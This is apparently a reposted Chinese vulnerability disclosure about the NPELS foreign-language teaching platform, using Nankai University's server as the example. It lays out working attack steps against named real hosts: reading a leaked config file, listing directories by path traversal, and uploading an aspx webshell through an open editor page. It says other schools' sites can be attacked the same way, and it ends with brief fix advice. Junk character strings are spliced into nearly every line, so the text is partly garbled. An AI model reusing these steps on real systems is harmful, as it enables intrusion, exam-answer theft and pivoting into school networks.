好多大学都在用这个教学平台,这个漏洞会导致直接拿到试题答案,甚至作为跳板继续渗透进入学校其他服务器中
' a# y7 L8 b2 L% n* C4 s( j' A2 @& {
详细说明: E7 W! W: _: n8 b7 _
" A% z4 Y% M N8 h8 p) x2 }& R以南开大学的为例:
" r* Z& G& T! ^http://222.30.60.3/NPELS
9 b- G2 n0 ~5 qNPELS_LearningCenter_5.0 客户端下的 Update.exe.config 文件泄露一个重要地址
3 E8 r: i( P& P1 q0 p: k# b" l) \<setting name="Update_CommonSvr_CommonService" serializeAs="String">" P7 z. N0 @( n/ p9 G; x
<value>http://222.30.60.3/NPELS/CommonService.asmx</value>: W7 k$ v4 t1 e/ Z: U
</setting>
. k0 b' C" x- l9 B9 i及版本号
) n3 l; e2 P$ Y5 L: j4 e' m<add key="TVersion" value="1, 0, 0, 2187">
% h: b% S% v( f9 a! Q' I- d</add># B8 G4 z% y! O0 I! A" [, t, S. S- R
直接访问9 \) F2 S1 }- d: t- C" \
http://222.30.60.3/NPELS/CommonService.asmx3 W" F. C5 } p* b
使用GetTestClientFileList操作,直接 HTTP GET 列目录:* w( t2 L) o( j/ O; g
http://222.30.60.3/NPELS/CommonS ... tFileList?version=1, 0, 0, 2187
K7 u; _3 O/ R I- O# K5 F8 }进一步列目录(返回的网页很大,可以直接 wget 下来)
5 n L& _6 R% A9 K# n. c5 d8 ghttp://222.30.60.3/NPELS/CommonS ... List?version=../../
2 ? r% a" Q1 u5 N% @" b5 I/ ]
: k8 h8 [& a6 F( N P# x发现
2 L9 m: q* H+ g& B8 y8 [http://zzxx.nankai.edu.cn/npelsv/editor/editor.htm
8 F' P7 _8 L: w8 b1 H q4 Q可以上传,直接上传aspx木马即可,不需要改后缀名或者文件头
: ~/ x! I2 P4 W7 y上传后继续列目录找到木马地址直接访问即可
' i( O" a$ E% {. l( {8 A
3 L" k3 w% z. d9 E. NOOXX
0 X K% j& }, f! Z3 A2 [! B
, J6 N! w! S3 z, U7 q) ?6 Z* yGoogle "新理念外语网络教学平台" 测试了几个其他的站,都有类似的列目录上传方法# x8 H4 f' V: Q f
漏洞证明:
; H L* g3 M1 m F! V! j 2 M4 Z, j h+ [% z, f$ R( Q) B
列目录:
) g/ w/ G$ l! r3 xhttp://222.30.60.3/NPELS/CommonS ... List?version=../../
$ M& P, F* }8 Y8 R8 w9 P$ s* k文件上传:
6 X7 G/ d+ T% o* [; e, S" ohttp://222.30.60.3/npelsv/editor/editor.htm
& g. g, u4 P6 W* ^+ I
' n5 j7 F, b3 T0 D$ H4 v8 G$ h) \上传木马:& }: S, ^) { @8 ~: t& V
http://222.30.60.3/npelsv/editor/uploadfiles/1.aspx; K4 x n: e7 d2 ?
. t& U* ~+ H `* l) A修复方案:% y8 _( K. C' Y5 ~- o0 W
好像考试系统必须使用 CommonService.asmx
* T5 R% w Y8 o3 G0 @最好配置文件加密或者用别的方式不让它泄露出来% v. A7 C( L4 `$ o9 ?0 p
并且检查或删除各上传入口,像 http://222.30.60.3/NPELS/Upload.aspx 一样* \* H' q& E2 W$ ?% }
|